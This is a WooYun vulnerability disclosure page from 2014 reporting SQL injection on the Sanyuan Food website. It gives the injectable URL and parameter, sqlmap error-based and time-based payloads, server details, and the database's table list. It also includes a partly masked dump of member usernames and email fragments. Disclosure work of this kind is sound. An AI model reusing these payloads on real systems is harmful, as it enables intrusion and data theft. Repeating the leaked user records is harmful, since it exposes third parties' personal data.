当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081320

漏洞标题:三元食品sql注入(4k用户信息泄漏)

相关厂商:三元食品

漏洞作者: xxsec

提交时间:2014-10-30 14:46

修复时间:2014-12-14 14:48

公开时间:2014-12-14 14:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入都懂·········

详细说明:

1.注入点:
http://www.sanyuan.com.cn/flash_upload.php?modelid=1
2

sqlmap identified the following injection points with a total of 305 HTTP(s) requests:
---
Place: GET
Parameter: modelid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: modelid=1 AND (SELECT 5026 FROM(SELECT COUNT(*),CONCAT(0x71626c7871,(SELECT (CASE WHEN (5026=5026) THEN 1 ELSE 0 END)),0x71676b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: modelid=1 AND SLEEP(30)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
Database: powercms
[102 tables]
+------------------------------+
| powercms_admin |
| powercms_admin_role |
| powercms_admin_role_priv |
| powercms_ads |
| powercms_ads_place |
| powercms_ads_stat |
| powercms_announce |
| powercms_area |
| powercms_attachment |
| powercms_author |
| powercms_block |
| powercms_c_down |
| powercms_c_info |
| powercms_c_ku6video |
| powercms_c_news |
| powercms_c_picture |
| powercms_c_product |
| powercms_c_video |
| powercms_cache_count |
| powercms_category |
| powercms_collect |
| powercms_comment |
| powercms_content |
| powercms_content_count |
| powercms_content_position |
| powercms_content_tag |
| powercms_copyfrom |
| powercms_datasource |
| powercms_editor_data |
| powercms_guestbook |
| powercms_hits |
| powercms_ipbanned |
| powercms_keylink |
| powercms_keyword |
| powercms_link |
| powercms_log |
| powercms_mail |
| powercms_mail_email |
| powercms_mail_email_type |
| powercms_map_centers |
| powercms_map_points |
| powercms_member |
| powercms_member_cache |
| powercms_member_company |
| powercms_member_detail |
| powercms_member_group |
| powercms_member_group_extend |
| powercms_member_group_priv |
| powercms_member_info |
| powercms_menu |
| powercms_menu_51net |
| powercms_menu_copy |
| powercms_message |
| powercms_model |
| powercms_model_field |
| powercms_model_field_bak |
| powercms_module |
| powercms_order |
| powercms_order_deliver |
| powercms_order_log |
| powercms_pay_card |
| powercms_pay_exchange |
| powercms_pay_payment |
| powercms_pay_pointcard_type |
| powercms_pay_stat |
| powercms_pay_user_account |
| powercms_player |
| powercms_position |
| powercms_process |
| powercms_process_status |
| powercms_role |
| powercms_search |
| powercms_search_type |
| powercms_session |
| powercms_status |
| powercms_times |
| powercms_type |
| powercms_urlrule |
| powercms_video |
| powercms_video_count |
| powercms_video_data |
| powercms_video_position |
| powercms_video_special |
| powercms_video_special_list |
| powercms_video_tag |
| powercms_vote_data |
| powercms_vote_option |
| powercms_vote_subject |
| powercms_vote_useroption |
| powercms_workflow |
| powercms_yp_apply |
| powercms_yp_buy |
| powercms_yp_cert |
| powercms_yp_collect |
| powercms_yp_count |
| powercms_yp_guestbook |
| powercms_yp_job |
| powercms_yp_news |
| powercms_yp_product |
| powercms_yp_relation |
| powercms_yp_stats |
| powercms_yp_stock |
+------------------------------+


3部分数据

mask 区域
*****njection points with a *****
*****-*****
*****: G*****
*****: mod*****
*****rror-b*****
*****error-based - WH*****
***** (5026=5026) THEN 1 ELSE 0 END)),0x71676b7871,FLOO*****
**********
*****R time-b*****
*****.0.11 AND ti*****
*****lid=1 AND*****
*****-*****
*****system: Lin*****
*****ogy: Apache *****
*****MS: My*****
***** powe*****
*****rcms_m*****
*****ntr*****
*****--------+--------+---------+-----------*****
***** | amount | message | username *****
*****--------+--------+---------+-----------*****
***** | 0.00 | 0 | admin *****
***** | 0.00 | 0 | jack *****
***** | 0.00 | 0 | 王峰 *****
***** | 0.00 | 0 | lsq *****
***** | 0.00 | 0 | 123 *****
***** | 0.00 | 0 | yb_mky *****
***** | 0.00 | 0 | 所谓 *****
***** | 0.00 | 0 | 所谓1 *****
*****om | 0.00 | 0 | 梓凡 *****
***** | 0.00 | 0 | xhk003 *****
***** | 0.00 | 0 | 企业商桥 *****
*****m | 0.00 | 0 | lingzi7522*****
*****.com.cn | 0.00 | 0 | chaiqiong *****
*****om | 0.00 | 0 | 47111111 *****
***** | 0.00 | 0 | mameihan *****
***** | 0.00 | 0 | yuanyuan *****
***** | 0.00 | 0 | 刘源源 *****
***** | 0.00 | 0 | gromentt *****
*****com | 0.00 | 0 | searchfutu*****
***** | 0.00 | 0 | 张军 *****
***** | 0.00 | 0 | jim136 *****
***** | 0.00 | 0 | 119776501 *****
***** | 0.00 | 0 | liberydn *****
***** | 0.00 | 0 | 虎子 *****
*****om | 0.00 | 0 | rosesnowjo*****
***** | 0.00 | 0 | gcgc | 0 *****

漏洞证明:

看详情

修复方案:

过滤

版权声明:转载请注明来源 xxsec@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论